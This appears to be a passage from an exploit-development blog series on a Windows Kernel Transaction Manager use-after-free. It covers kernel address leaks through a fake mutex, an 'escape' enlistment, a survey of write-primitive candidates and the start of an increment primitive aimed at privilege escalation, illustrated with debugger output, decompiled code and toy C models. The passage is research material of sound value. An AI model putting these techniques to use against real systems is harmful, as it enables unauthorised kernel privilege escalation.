- TL;DR

- Initial kernel address revelation

- ‘Escape’ enlistment

- Candidate functions for a write primitive

- Increment primitive

- Arbitrary kernel read primitive

- Privilege escalation

- Caveats

- Demo

- Conclusion

TL;DR

In part 3 of this series, we explained how we win the race condition and replace a kernel object known as _KENLISTMENT with controlled data that points to another fake _KENLISTMENT in userland. We showed that this lets us inject a queue of enlistments repeatedly, because the recovery thread is stuck in the TmRecoverResourceManager() loop.

We now explain what this control actually lets us do when building better exploit primitives, such as an arbitrary read/write primitive that leads to privilege escalation. We also need to work out how to make the recovery thread escape the loop and return cleanly.

Initial kernel address revelation

While investigating how to build a write primitive, we printed our fake userland _KENLISTMENT after the kernel had touched it. We noticed that two interesting kernel addresses were being leaked into substructures inside it.

To demonstrate this, we set a breakpoint on the KENLISTMENT_SUPERIOR flag logic we mentioned in part 3 and then look at the content of our userland _KENLISTMENT that is being handled by the kernel:

1: kd> u
nt!TmRecoverResourceManager+0x192:
fffff800`02d75b2a 41bf00080000    mov     r15d,800h
fffff800`02d75b30 44897c2448      mov     dword ptr [rsp+48h],r15d
fffff800`02d75b35 eb37            jmp     nt!TmRecoverResourceManager+0x1d6 (fffff800`02d75b6e)
fffff800`02d75b37 85c9            test    ecx,ecx
fffff800`02d75b39 750d            jne     nt!TmRecoverResourceManager+0x1b0 (fffff800`02d75b48)
fffff800`02d75b3b 488b4718        mov     rax,qword ptr [rdi+18h]
fffff800`02d75b3f 83b8c000000005  cmp     dword ptr [rax+0C0h],5
fffff800`02d75b46 7414            je      nt!TmRecoverResourceManager+0x1c4 (fffff800`02d75b5c)
1: kd> r
rax=00000000001307b8 rbx=fffffa8013f3eb01 rcx=0000000000000001
rdx=0000000000000004 rsi=fffffa8014ac5620 rdi=00000000001300b8
rip=fffff80002d75b2a rsp=fffff88003c749d0 rbp=fffff88003c74b60
 r8=0000000000000001  r9=0000000000000000 r10=0000000000000000
r11=fffff88002f00180 r12=fffffa8013f3eaf0 r13=fffffa8013f3ec00
r14=0000000000000000 r15=0000000000000100
1: kd> dt _KENLISTMENT @rdi-0x88
nt!_KENLISTMENT
   +0x000 cookie : 0
   +0x008 NamespaceLink : _KTMOBJECT_NAMESPACE_LINK
   +0x030 EnlistmentId : _GUID {00000000-0000-0000-0000-000000000000}
   +0x040 Mutex : _KMUTANT
   +0x078 NextSameTx : _LIST_ENTRY [ 0x00000000`00000000 - 0x0 ]
   +0x088 NextSameRm : _LIST_ENTRY [ 0x00000000`0033fec8 - 0x0 ]
   +0x098 ResourceManager : (null)
   +0x0a0 Transaction : 0x00000000`001307b8 _KTRANSACTION
   +0x0a8 State : 0 ( KEnlistmentUninitialized )
   +0x0ac Flags : 0x81
   +0x0b0 NotificationMask : 0
   +0x0b8 Key : (null)
   +0x0c0 KeyRefCount : 0
   +0x0c8 RecoveryInformation : (null)
   +0x0d0 RecoveryInformationLength : 0
   +0x0d8 DynamicNameInformation : (null)
   +0x0e0 DynamicNameInformationLength : 0
   +0x0e8 FinalNotification : (null)
   +0x0f0 SupSubEnlistment : (null)
   +0x0f8 SupSubEnlHandle : (null)
   +0x100 SubordinateTxHandle : (null)
   +0x108 CrmEnlistmentEnId : _GUID {00000000-0000-0000-0000-000000000000}
   +0x118 CrmEnlistmentTmId : _GUID {00000000-0000-0000-0000-000000000000}
   +0x128 CrmEnlistmentRmId : _GUID {00000000-0000-0000-0000-000000000000}
   +0x138 NextHistory : 0
   +0x13c History : [20] _KENLISTMENT_HISTORY
1: kd> dt _KMUTANT @rdi-0x88+0x40
nt!_KMUTANT
   +0x000 Header : _DISPATCHER_HEADER
   +0x018 MutantListEntry : _LIST_ENTRY [ 0xfffffa80`0531ae58 - 0xfffffa80`13f3eb30 ]
   +0x028 OwnerThread : 0xfffffa80`0531ab50 _KTHREAD
   +0x030 Abandoned : 0 ''
   +0x031 ApcDisable : 0 ''

Above, we see that two kernel pointers have been written into the _KMUTANT.MutantListEntry field of our fake userland enlistment. We inspect the associated pool headers to confirm their type:

1: kd> !pool 0xfffffa80`0531ae58 2
Pool page fffffa800531ae58 region is Nonpaged pool
*fffffa800531aaf0 size: 510 previous size: 80 (Allocated) *Thre (Protected)
        Pooltag Thre : Thread objects, Binary : nt!ps
1: kd> !pool 0xfffffa80`13f3eb30 2
Pool page fffffa8013f3eb30 region is Nonpaged pool
*fffffa8013f3ea80 size: 2c0 previous size: 340 (Allocated) *TmRm (Protected)
        Pooltag TmRm : Tm KRESOURCEMANAGER object, Binary : nt!tm

After some analysis, we found that this happens while the fake _KMUTANT associated with our fake _KENLISTMENT is being locked. Understanding this leak helps explain how to break out of the while loop the recovery thread is stuck in, so we’ll jump ahead a bit and cover it first.

Specifically, two pointers end up in our mutex:

- a pointer into the _KTHREAD of the recovery thread stuck inside TmRecoverResourceManager()
- a pointer into the _KRESOURCEMANAGER structure being recovered

Both are written when our mutex is inserted into a linked list that tracks which mutexes the thread currently holds. Even after our fake mutex is removed from this list, these two pointers remain in the structure. This means we can read them from userland after the fact.

To understand why this leak happens, we need to look at the KeWaitForSingleObject() call in the TmRecoverResourceManager() loop, which is passed the mutex embedded in our userland _KENLISTMENT structure:

while ( pEnlistment != EnlistmentHead_addr )
{
    if ( ADJ(pEnlistment)->Flags & KENLISTMENT_FINALIZED ) {
        pEnlistment = ADJ(pEnlistment)->NextSameRm.Flink;
    }
    else {
        ObfReferenceObject(ADJ(pEnlistment));
        KeWaitForSingleObject(&ADJ(pEnlistment)->Mutex, Executive, 0, 0, 0i64);
        //...

Let’s assume we are working with a blank-slate Mutex. This means we can specify any of its fields, and because it is fake and lives in userland, this is the first time it is being referenced. The Mutex is of the _KMUTANT type.

KeWaitForSingleObject() is a huge function, so we will only detail some of its internals here. In the code below, Object is our _KMUTANT*, so we set Object->Header.SignalState > 0 to enter the second if condition.

if ( (Object->Header.Type & 0x7F) != MutantObject )
{
    //...
}
if ( Object->Header.SignalState > 0
  || CurrentThread == Object->OwnerThread && Object->Header.TimerMiscFlags == CurrentPrcb->DpcRoutineActive )
{
    SignalState = Object->Header.SignalState;
    if ( SignalState == 0x80000000 )
    {
        //...
    }

For example, let’s set Object->Header.SignalState to 1. SignalState then becomes 0 below, so we avoid the goto branch and continue.

    Object->Header.SignalState = --SignalState;
    if ( SignalState )
        goto b_try_threadlock_stuff;
    CurrentThread->WaitStatus = 0i64;

Next we see the following code:

if ( _interlockedbittestandset64(&CurrentThread->ThreadLock, 0i64) )
{
    spincounter = 0;
    do
    {
        if ( ++spincounter & HvlLongSpinCountMask || !(HvlEnlightenments & 0x40) )
            _mm_pause();
        else
            HvlNotifyLongSpinWait(spincounter);
    }
    while ( CurrentThread->ThreadLock || _interlockedbittestandset64(&CurrentThread->ThreadLock, 0i64) );
    CurrentPrcb = Timeoutb;
}

CurrentThread->KernelApcDisable -= Object->ApcDisable;
if ( CurrentPrcb->CurrentThread == CurrentThread )
    DpcRoutineActive = CurrentPrcb->DpcRoutineActive;
else
    DpcRoutineActive = 0;
_m_prefetchw(Object);
ObjectLock = Object->Header.Lock;
HIBYTE(ObjectLock) = DpcRoutineActive;
Object->OwnerThread = CurrentThread;
Object->Header.Lock = ObjectLock;

Here, CurrentThread points to the _KTHREAD of the recovery thread stuck in the TmRecoverResourceManager() loop. The code therefore sets Object->OwnerThread to this thread, which is exactly what we were interested in.

Next, our _KMUTANT* (Object) is inserted at the tail of the owner thread’s mutant linked list (_KTHREAD.MutantListHead). After insertion:

- The Blink entry points into the _KRESOURCEMANAGER structure associated with our resource manager (the list entry of its mutex), because that was the last mutant the thread locked.

- The Flink entry points to _KTHREAD.MutantListHead, the head of the list of mutants held by the thread.

MutantListHead = &CurrentThread->MutantListHead;
MutantListHead_Blink = CurrentThread->MutantListHead.Blink;
Object->MutantListEntry.Flink = &CurrentThread->MutantListHead;
Object->MutantListEntry.Blink = MutantListHead_Blink;
MutantListHead_Blink->Flink = &Object->MutantListEntry;
CurrentThread->MutantListHead.Blink = &Object->MutantListEntry;





The following diagram illustrates this leak into the MutantListEntry.Flink and MutantListEntry.Blink fields of the _KMUTANT which also contains an internal _DISPATCHER_HEADER member defining it as the MutantObject type.

In conclusion, because our _KMUTANT is linked into the owner thread’s mutant list, we can leak the addresses of two important kernel structures, which we will rely on later.
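The leak comes down to ordinary tail insertion into a circular doubly linked list, followed by an unlink that never clears the removed entry’s own links. The following is a minimal user-space sketch of that behaviour. It uses a hypothetical list_entry type rather than the real kernel definitions, with these stand-ins:

- thread_head stands in for _KTHREAD.MutantListHead.
- rm_entry stands in for the resource manager mutex’s list entry.

It assumes the unlink behaves like the KeReleaseMutant() excerpt, which only rewires the neighbours.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for LIST_ENTRY: same two-pointer shape, not the kernel type. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* An empty circular list: the head points at itself in both directions. */
static void list_init(list_entry *head) {
    head->flink = head;
    head->blink = head;
}

/* Tail insertion, mirroring the decompiled KeWaitForSingleObject() excerpt. */
static void list_insert_tail(list_entry *head, list_entry *entry) {
    assert(head != NULL && entry != NULL);
    list_entry *old_tail = head->blink;
    entry->flink = head;      /* Flink -> list head (inside the owner thread) */
    entry->blink = old_tail;  /* Blink -> previously last-locked mutant       */
    old_tail->flink = entry;
    head->blink = entry;
}

/* Unlink that only rewires the neighbours: the removed entry keeps its links. */
static void list_remove(list_entry *entry) {
    entry->blink->flink = entry->flink;
    entry->flink->blink = entry->blink;
}
```

Suppose rm_entry is inserted first, then fake_entry, and fake_entry is then removed. This leaves fake_entry.flink == &thread_head and fake_entry.blink == &rm_entry, which are the two values that remain readable afterwards.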

‘Escape’ enlistment

These initial kernel address revelations turn out to be very valuable. Until now, the recovery thread stuck in the while loop in TmRecoverResourceManager() had no way out. Recall the loop condition:

EnlistmentHead_addr = &pResMgr->EnlistmentHead;
pEnlistment_shifted = pResMgr->EnlistmentHead.Flink;
while ( pEnlistment_shifted != EnlistmentHead_addr ) {
    [...]
    pEnlistment_shifted = ADJ(pEnlistment_shifted)->NextSameRm.Flink;
}

The kernel keeps following whatever Flink value we provide in the fake _KENLISTMENT we craft in userland. As detailed in part 3, this is typically a trap enlistment or a primitive enlistment, although we have not yet defined what kind of primitive enlistment we will use.

Unless we know the address of pResMgr->EnlistmentHead, the recovery thread will be stuck in this loop in the kernel. One exception to this is if it’s possible to cause the resource manager to transition to an offline state, but we won’t discuss that here.

Fortunately for us, we now have the address of the _KRESOURCEMANAGER structure, so we can simply calculate the address of EnlistmentHead inside it. When we finally want the recovery thread to exit the TmRecoverResourceManager() loop, we inject a new type of enlistment that we call an escape enlistment. Its NextSameRm.Flink member is set to the leaked _KRESOURCEMANAGER.EnlistmentHead address. This lets the recovery thread exit the loop and, eventually, return from the kernel.
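The escape condition can be modelled as a sentinel-headed list walk. This is a user-space sketch: toy_enlistment and walk_until_head are hypothetical names, and ADJ here is a toy macro built on offsetof.

- An entry whose link points back at itself keeps the walk going forever. A step cap reports that case, since the real loop has no cap.
- An entry whose Flink points at the head, as the escape enlistment’s NextSameRm.Flink does, ends the walk.

```c
#include <assert.h>
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Hypothetical, heavily simplified enlistment: only the link the loop follows. */
typedef struct toy_enlistment {
    int id;
    list_entry next_same_rm;
} toy_enlistment;

/* Same idea as ADJ(): recover the enlistment from a pointer to its embedded link. */
#define ADJ(p) ((toy_enlistment *)((char *)(p) - offsetof(toy_enlistment, next_same_rm)))

/* Walk like the recovery loop does. Returns the number of enlistments visited,
   or -1 if max_steps is reached (the real loop would keep spinning). */
static int walk_until_head(list_entry *head, int max_steps) {
    int visited = 0;
    list_entry *cur = head->flink;
    while (cur != head) {
        if (visited == max_steps)
            return -1;
        visited++;
        cur = ADJ(cur)->next_same_rm.flink;
    }
    return visited;
}
```

A self-referencing entry makes walk_until_head() return -1. Chaining it to an escape entry whose link points at the head makes the walk return 2.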

This is a nice milestone to reach even before getting code execution. It lets you trigger the vulnerability cleanly multiple times without rebooting the machine, which speeds up exploit development considerably. It also helps you solidify your mental model of everything up to this point.





The following diagram illustrates how the flow from initial use-after-free to escaping the loop will actually look during exploitation, with the use-after-free enlistment referencing some initial trap enlistment which tells us we won the race. This trap is eventually followed by the injection of one or more sets of primitive enlistments that allow us to manipulate the kernel, followed by trap enlistments that let us process the results of the writes (if necessary), and finally an escape enlistment.

In the diagram above, LWP refers to "Limited Write Primitive", which we describe in the rest of this blog post.

Candidate functions for a write primitive

When looking for a write primitive, we have a limited number of options, because all of our opportunities come while the recovery thread is running inside the TmRecoverResourceManager() loop. We need to identify which functions operate on our fake userland _KENLISTMENT. We will discuss the functions we explored but did not use, and the function we chose for our final exploit.

We will explore the following five calls made within the TmRecoverResourceManager() loop:

while ( pEnlistment_shifted != EnlistmentHead_addr )
{
    //...
    ObfReferenceObject(ADJ(pEnlistment_shifted));
    KeWaitForSingleObject(&ADJ(pEnlistment_shifted)->Mutex, Executive, 0, 0, 0i64);
    //...
    KeReleaseMutex(&ADJ(pEnlistment_shifted)->Mutex, 0);
    //...
    ret = TmpSetNotificationResourceManager(
              pResMgr,
              ADJ(pEnlistment_shifted),
              0i64,
              NotificationMask,
              0x20u,
              notification_recovery_arg);
    //...
    ObfDereferenceObject(ADJ(pEnlistment_shifted));
    //...
}

We will leave the KeReleaseMutex() call until the end, as it turned out to be the most interesting one. First, we go over the others to show our research process.

ObfReferenceObject()

This function is called on our fake userland _KENLISTMENT*. It is very straightforward and doesn’t offer much opportunity for abuse. Our fake userland _KENLISTMENT is indeed prefixed with a fake _OBJECT_HEADER in userland, so it is a candidate, but there is not a whole lot we can use it for:

LONG_PTR __stdcall ObfReferenceObject(PVOID Object)
{
    _OBJECT_HEADER *pObjHeader; // rdi

    pObjHeader = CONTAINING_RECORD(Object, _OBJECT_HEADER, Body);
    if ( ObpTraceFlags && pObjHeader->TraceFlags & 1 )
        ObpPushStackInfo(Object - 48, 1, 1, 'tlfD');
    return _InterlockedExchangeAdd64(&pObjHeader->PointerCount, 1ui64) + 1;
}

We could potentially try to abuse ObpPushStackInfo() here, but it didn’t seem particularly useful.

Another quirk of targeting ObfReferenceObject() is that there is an unavoidable call to ObfDereferenceObject() later in TmRecoverResourceManager(). Whatever we did here would therefore need additional work to keep that later call safe.
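The header-before-body layout that ObfReferenceObject() relies on can be modelled in user space. The following is a minimal sketch under these assumptions:

- toy_object_header is a hypothetical type, not the real _OBJECT_HEADER definition.
- Its body starts 0x30 bytes in, matching the `Object - 48` in the excerpt.
- CONTAINING_RECORD is rebuilt on offsetof.
- The reference-count bump is mimicked without the interlocked operation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Same idea as the WDK macro: step back from a field to its enclosing struct. */
#define CONTAINING_RECORD(address, type, field) \
    ((type *)((char *)(address) - offsetof(type, field)))

/* Hypothetical stand-in for _OBJECT_HEADER: only the layout matters here,
   namely that the object body begins 0x30 bytes after the header start. */
typedef struct toy_object_header {
    int64_t pointer_count;      /* stands in for PointerCount */
    unsigned char other[0x28];  /* placeholder for the remaining header fields */
    unsigned char body[8];      /* the object itself (e.g. an enlistment) starts here */
} toy_object_header;

_Static_assert(offsetof(toy_object_header, body) == 0x30, "body must start at 0x30");

/* Toy reference bump: locate the header from the body pointer and increment
   the count (the kernel uses _InterlockedExchangeAdd64 instead of ++). */
static int64_t toy_reference_object(void *object) {
    toy_object_header *header = CONTAINING_RECORD(object, toy_object_header, body);
    assert(header != NULL);
    return ++header->pointer_count;
}
```

Because the header is found purely by pointer arithmetic from the body, a fake body in userland implies a fake header in userland as well.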

KeWaitForSingleObject()

As we saw earlier in this blog post, this function is passed a pointer to _KENLISTMENT.Mutex, a _KMUTANT structure embedded in our fake userland _KENLISTMENT, so we control the _KMUTANT contents too. KeWaitForSingleObject() is a fairly complicated function (~900 Hex-Rays decompiled lines), so it has some interesting potential.

As with ObfReferenceObject(), there is an important caveat. Later in TmRecoverResourceManager(), before we make the recovery thread exit the loop, this same mutex is also passed to KeReleaseMutex(), which expects it to be a valid-enough _KMUTANT. This greatly limits the interesting code paths we could abuse in KeWaitForSingleObject(), as anything we manipulate must remain safe for KeReleaseMutex().

Because of this KeReleaseMutex() safety limitation, we chose to look elsewhere.

TmpSetNotificationResourceManager()

We originally assumed this would be the best candidate for exploitation, partly because it is simple to analyze and it handles structures we are already familiar with. This function is passed the _KRESOURCEMANAGER and our fake userland _KENLISTMENT.

This function queries the associated _KRESOURCEMANAGER structure for its NotificationRoutine function pointer, which is typically unset. If we eventually went for code execution, this pointer would be a useful target, as it isn’t used anywhere else on the system. For now, however, we are only looking for a write primitive.

This function also calls KeWaitForSingleObject() and KeReleaseMutex() on our _KENLISTMENT’s mutex, but if we wanted to abuse those, we may as well use the calls in the caller.

One piece of code in this function looks especially promising, and we originally thought we could make use of it. Below, we see that the pFinalNotificationPacket pointer is fetched from our fake userland _KENLISTMENT, so we could make it point to a completely controlled notification structure:

pFinalNotificationPacket = NULL;
//...
if ( Enlistment )
{
    bIsCommitRelatedNotification = Enlistment->Flags & KENLISTMENT_SUPERIOR ? NotificationMask == TRANSACTION_NOTIFY_COMMIT_COMPLETE : NotificationMask == TRANSACTION_NOTIFY_COMMIT;
    if ( bIsCommitRelatedNotification || NotificationMask == TRANSACTION_NOTIFY_ROLLBACK )
    {
        KeWaitForSingleObject(&Enlistment->Mutex, Executive, 0, 0, NULL);
        curEnlistmentFlags = Enlistment->Flags;
        if ( !(curEnlistmentFlags & KENLISTMENT_FINAL_NOTIFICATION) )
        {
            pFinalNotificationPacket = Enlistment->FinalNotification;
            Enlistment->Flags = curEnlistmentFlags | KENLISTMENT_FINAL_NOTIFICATION;
        }
        KeReleaseMutex(&Enlistment->Mutex, 0);
        if ( pFinalNotificationPacket )
            goto b_skip_allocation_;
    }
}

Let’s assume we set pFinalNotificationPacket to point to another userland structure we control. Since pFinalNotificationPacket is not NULL, the pool allocation is skipped, and at least one fully controlled value (key) is written through the pointer, which could be useful:

pFinalNotificationPacket = ExAllocatePoolWithTag(NonPagedPool, alloc_size, 'oNmT');
if ( pFinalNotificationPacket )
{
b_skip_allocation_:
    if ( Enlistment && pRM->NotificationRoutine )
    {
        pFinalNotificationPacket->enlistment = Enlistment;
        ObfReferenceObject(Enlistment);
    }
    else
    {
        pFinalNotificationPacket->enlistment = NULL;
    }
    pFinalNotificationPacket->EnlistmentNotificationMask = NotificationMask;
    pFinalNotificationPacket->key = key;
    pFinalNotificationPacket->guid_size = recovery_arg_size;
    pFinalNotificationPacket->time_transaction = time_transaction.QuadPart;
    memmove(pFinalNotificationPacket->enlistment_guid, enlistment_guid, recovery_arg_size);
    KeWaitForSingleObject(&pRM->NotificationMutex, Executive, 0, 0, 0i64);
    pCompletionBinding = pRM->CompletionBinding;

However, if we rewind and check the prerequisites for reaching this code, there is one big problem. Enlistment->FinalNotification is only used if NotificationMask equals one of the following values:

- TRANSACTION_NOTIFY_COMMIT_COMPLETE (for a superior enlistment)

- TRANSACTION_NOTIFY_COMMIT (otherwise)

- TRANSACTION_NOTIFY_ROLLBACK

TmRecoverResourceManager() explicitly sets the mask to TRANSACTION_NOTIFY_RECOVER_QUERY or TRANSACTION_NOTIFY_RECOVER before calling TmpSetNotificationResourceManager(), and we cannot control this. As a result, abusing this code appears to be a dead end.
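The gate can be restated as a small predicate. This sketch copies the notification constants from the Windows SDK’s ktmtypes.h. The RECOVER_QUERY (0x800) and RECOVER (0x100) values match the `mov r15d,800h` and the r15 value of 0x100 in the debugger output earlier. The sketch shows that neither recovery mask reaches the FinalNotification path, whatever the KENLISTMENT_SUPERIOR flag is.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Notification mask values as defined in the Windows SDK header ktmtypes.h. */
#define TRANSACTION_NOTIFY_COMMIT          0x00000004u
#define TRANSACTION_NOTIFY_ROLLBACK        0x00000008u
#define TRANSACTION_NOTIFY_COMMIT_COMPLETE 0x00000040u
#define TRANSACTION_NOTIFY_RECOVER         0x00000100u
#define TRANSACTION_NOTIFY_RECOVER_QUERY   0x00000800u

/* Restatement of the condition in the decompiled TmpSetNotificationResourceManager()
   excerpt: true when Enlistment->FinalNotification would be consulted. */
static bool uses_final_notification(bool is_superior, uint32_t mask) {
    bool commit_related = is_superior ? mask == TRANSACTION_NOTIFY_COMMIT_COMPLETE
                                      : mask == TRANSACTION_NOTIFY_COMMIT;
    return commit_related || mask == TRANSACTION_NOTIFY_ROLLBACK;
}
```

The check compares the mask for equality rather than testing bits. A recovery notification therefore never qualifies, even though we control the superior flag.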

Furthermore, a number of uncontrolled values are written alongside the controlled one. Even if we could use this write primitive, we would have to be very careful about where we write, to avoid corrupting important values as a side effect.

ObfDereferenceObject()

This function is passed our fake userland _KENLISTMENT* as the Object. In memory, the object body (a _KENLISTMENT in our case) is preceded by an _OBJECT_HEADER.

ObfDereferenceObject() is a very well-known function, and related exploitation techniques have been described in the past.

As a result, Microsoft has gradually hardened it. One older attack targeting this logic provided an invalid _OBJECT_HEADER.TypeIndex of 0, so that a userland pointer from ObTypeIndexTable was used. This in turn allowed a function pointer specified in userland to be called.

This is the code for our Windows 7 x64 target:

pObjectType = ObTypeIndexTable[pObjectHeader->TypeIndex];
if ( pObjectType == ObpTypeObjectType )
    KeBugCheckEx(0xF4u, pObjectType, pObjectHeader + 0x30, 0, 0);
if ( pObjectHeader->SecurityDescriptor )
    (pObjectType->TypeInfo.SecurityProcedure)(
        &pObjectHeader->Body,
        2i64,
        0i64,
        0i64,
        0i64,
        pObjectHeader->SecurityDescriptor,
        0,
        0i64,
        0);

This has been mitigated in Windows 10 by Object TypeIndex field encoding, SMEP, and a non-userland address at index 0.

We wanted a mechanism that works from Vista through Windows 10, so we chose not to attack this. The hardening in newer Windows 10 builds seemed difficult to bypass, especially without an arbitrary read primitive.

KeReleaseMutex()

In the end, KeReleaseMutex() turned out to be the best function. We initially selected it because we were working on Windows 7 and saw an easy mirror write primitive. Unfortunately, that primitive was mitigated in Windows 8 and later. Because we already had a solid understanding of this function’s internals, we were able to find another, albeit more finicky, primitive.

The call to KeReleaseMutex() in TmRecoverResourceManager() we will be targeting is the one below:

enlistment_guid = _mm_loadu_si128(&ADJ(pEnlistment)->EnlistmentId);
transaction_guid = _mm_loadu_si128(&ADJ(pEnlistment)->Transaction->UOW);
KeReleaseMutex(&ADJ(pEnlistment)->Mutex, 0);
if ( bSendNotification )
{
    //...
}

First, let’s take a look at what our Mutex is, which in our case will be a _KMUTANT:

struct _KMUTANT
{
    struct _DISPATCHER_HEADER Header;   //0x0
    struct _LIST_ENTRY MutantListEntry; //0x18
    struct _KTHREAD* OwnerThread;       //0x28
    UCHAR Abandoned;                    //0x30
    UCHAR ApcDisable;                   //0x31
};

It’s also worth seeing what the _DISPATCHER_HEADER structure looks like. Note that we’ve simplified some of the union fields below for readability and only include the relevant fields for discussion:

//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER {
    union {
        struct {
            UCHAR Type;                  //0x0
            union {
                [...]
                UCHAR Abandoned;         //0x1
                UCHAR Signalling;        //0x1
            };
            union {
                [...]
                UCHAR Hand;              //0x2
                UCHAR Size;              //0x2
            };
            union {
                [...]
                UCHAR DpcActive;         //0x3
            };
        };
        volatile LONG Lock;              //0x0
    };
    LONG SignalState;                    //0x4
    struct _LIST_ENTRY WaitListHead;     //0x8
};
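One way to sanity-check these layouts before building fake structures in userland is to mirror them in C and assert the offsets. The sketch below makes these assumptions:

- It is a simplified replica with hypothetical toy_ names.
- Each union keeps a single member per byte, as in the listing above.
- It targets x64 with 8-byte pointers.

The asserted offsets are those shown in the listings and in the earlier `dt _KMUTANT` output.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct toy_list_entry {
    struct toy_list_entry *Flink;
    struct toy_list_entry *Blink;
} toy_list_entry;

/* Simplified _DISPATCHER_HEADER replica (C11 anonymous struct/union). */
typedef struct toy_dispatcher_header {
    union {
        struct {
            uint8_t Type;        /* 0x0 */
            uint8_t Signalling;  /* 0x1 */
            uint8_t Size;        /* 0x2 */
            uint8_t DpcActive;   /* 0x3 */
        };
        volatile int32_t Lock;   /* 0x0, overlaps the four bytes above */
    };
    int32_t SignalState;          /* 0x4 */
    toy_list_entry WaitListHead;  /* 0x8 */
} toy_dispatcher_header;

/* Simplified _KMUTANT replica. */
typedef struct toy_kmutant {
    toy_dispatcher_header Header;    /* 0x00 */
    toy_list_entry MutantListEntry;  /* 0x18 */
    void *OwnerThread;               /* 0x28 */
    uint8_t Abandoned;               /* 0x30 */
    uint8_t ApcDisable;              /* 0x31 */
} toy_kmutant;

_Static_assert(sizeof(void *) == 8, "replica assumes 64-bit pointers");
_Static_assert(sizeof(toy_dispatcher_header) == 0x18, "_DISPATCHER_HEADER is 0x18 bytes");
_Static_assert(offsetof(toy_kmutant, MutantListEntry) == 0x18, "MutantListEntry at 0x18");
_Static_assert(offsetof(toy_kmutant, OwnerThread) == 0x28, "OwnerThread at 0x28");
_Static_assert(offsetof(toy_kmutant, Abandoned) == 0x30, "Abandoned at 0x30");
_Static_assert(offsetof(toy_kmutant, ApcDisable) == 0x31, "ApcDisable at 0x31");
```

If any listed offset disagrees with the replica, the static assertions stop compilation rather than letting a misplaced field go unnoticed.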

To construct a useful exploit primitive, we have to build a fairly complicated set of structures and associated values, some of which differ across OS versions. We will therefore walk through our approach on Windows 7 only, just to make it clear how to work these things out.



The following diagram illustrates our first phase, where we have some fake userland _KMUTANT (inside our fake userland _KENLISTMENT), which will be passed to KeReleaseMutex().

The KeReleaseMutex() function is just a wrapper for KeReleaseMutant():

LONG __stdcall KeReleaseMutex(PRKMUTEX Mutex, BOOLEAN Wait)
{
    return KeReleaseMutant(Mutex, 1, 0, Wait);
}

Increment primitive



In this section, we dive into the calls involved to show how to trigger an increment primitive, and how to satisfy the constraints needed to avoid crashing and exit safely.

Avoid RtlRaiseStatus() in KeReleaseMutant()

One important thing happens at the very beginning of KeReleaseMutant(): it raises the IRQL to DISPATCH_LEVEL. Page faults cannot be serviced at that level, so we need to avoid a page fault when the function accesses our userland addresses, or the machine will crash.

pCurrentThread = KeGetCurrentThread();
ApcDisable = 0;
CurrentIrql = KeGetCurrentIrql();
__writecr8(DISPATCH_LEVEL);
CurrentPrcb = KeGetCurrentPrcb();

A solution that avoids this most of the time is to keep all data referenced in userland within a single page, which reduces the likelihood of that page’s single TLB entry being flushed.
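The single-page layout constraint is easy to check mechanically. The helper below is a hypothetical sketch, not part of the exploit. It only tests whether a userland range stays inside one 4 KiB page, and says nothing about whether that page is actually resident.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_PAGE_SIZE 0x1000u  /* x64 small-page size (4 KiB) */

/* True if [addr, addr + len) lies entirely within a single 4 KiB page. */
static bool fits_in_one_page(uintptr_t addr, size_t len) {
    if (len == 0)
        return true;
    uintptr_t mask = ~(uintptr_t)(TOY_PAGE_SIZE - 1);
    uintptr_t first_page = addr & mask;
    uintptr_t last_page = (addr + len - 1) & mask;
    return first_page == last_page;
}
```

For example, a 0x100-byte structure at 0x1307b8 (the fake transaction address in the debugger output above) stays within the page at 0x130000. A 0x20-byte structure at 0x130ff0 would straddle two pages.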

Next comes the following logic:

if ( Abandoned )
{
    Mutant->Header.SignalState = 1;
    Mutant->Abandoned = 1;
}
else
{
    if ( Mutant->OwnerThread != pCurrentThread || Mutant->Header.DpcActive != CurrentPrcb->DpcRoutineActive )
    {
        _InterlockedAnd(&Mutant->Header.Lock, 0xFFFFFF7F);
        __writecr8(CurrentIrql);
        if ( Mutant->Abandoned )
            Status = STATUS_ABANDONED;
        else
            Status = STATUS_MUTANT_NOT_OWNED;
        RtlRaiseStatus(Status);
    }
    ++Mutant->Header.SignalState;
}

Abandoned is the third argument to KeReleaseMutant(), which KeReleaseMutex() always passes as 0. It is therefore not under our control, and we are forced into the else branch. If the nested ownership check fails, we hit RtlRaiseStatus(), which results in a BSOD. Otherwise, SignalState is incremented.

We need to ensure that Mutant->OwnerThread == pCurrentThread. When explaining our initial kernel address revelation, we showed that TmRecoverResourceManager() calls KeWaitForSingleObject() on our _KENLISTMENT.Mutex, and that this sets OwnerThread to the current thread. So this constraint is not a problem, and that logic lets us avoid the RtlRaiseStatus() call in KeReleaseMutant().

As we saw when analyzing KeWaitForSingleObject() for the initial kernel address revelation, SignalState is temporarily decremented to 0. However, after KeReleaseMutant() confirms that OwnerThread is set to the current thread, it increments SignalState back to 1:

if ( Mutant->OwnerThread != pCurrentThread || Mutant->Header.DpcActive != CurrentPrcb->DpcRoutineActive ) {
    [...]
}
++Mutant->Header.SignalState;

This re-adjustment of SignalState is important for the next section.
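The SignalState round trip and the ownership check can be captured in a toy model. This sketch makes the following simplifications:

- toy_mutant is a hypothetical type holding only the two fields involved.
- The DpcActive comparison and all locking are omitted.
- Where the real KeReleaseMutant() calls RtlRaiseStatus(), the sketch returns the STATUS_MUTANT_NOT_OWNED value (0xC0000046).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, simplified mutant: only the fields this round trip touches. */
typedef struct toy_mutant {
    int32_t signal_state;
    const void *owner_thread;
} toy_mutant;

#define TOY_STATUS_SUCCESS          0x00000000u
#define TOY_STATUS_MUTANT_NOT_OWNED 0xC0000046u  /* NTSTATUS STATUS_MUTANT_NOT_OWNED */

/* Acquire path from the KeWaitForSingleObject() excerpt (SignalState > 0 case). */
static void toy_wait(toy_mutant *m, const void *thread) {
    assert(m->signal_state > 0);  /* the branch we steer into with SignalState = 1 */
    m->signal_state--;
    m->owner_thread = thread;
}

/* Non-abandoned release path from the KeReleaseMutant() excerpt. */
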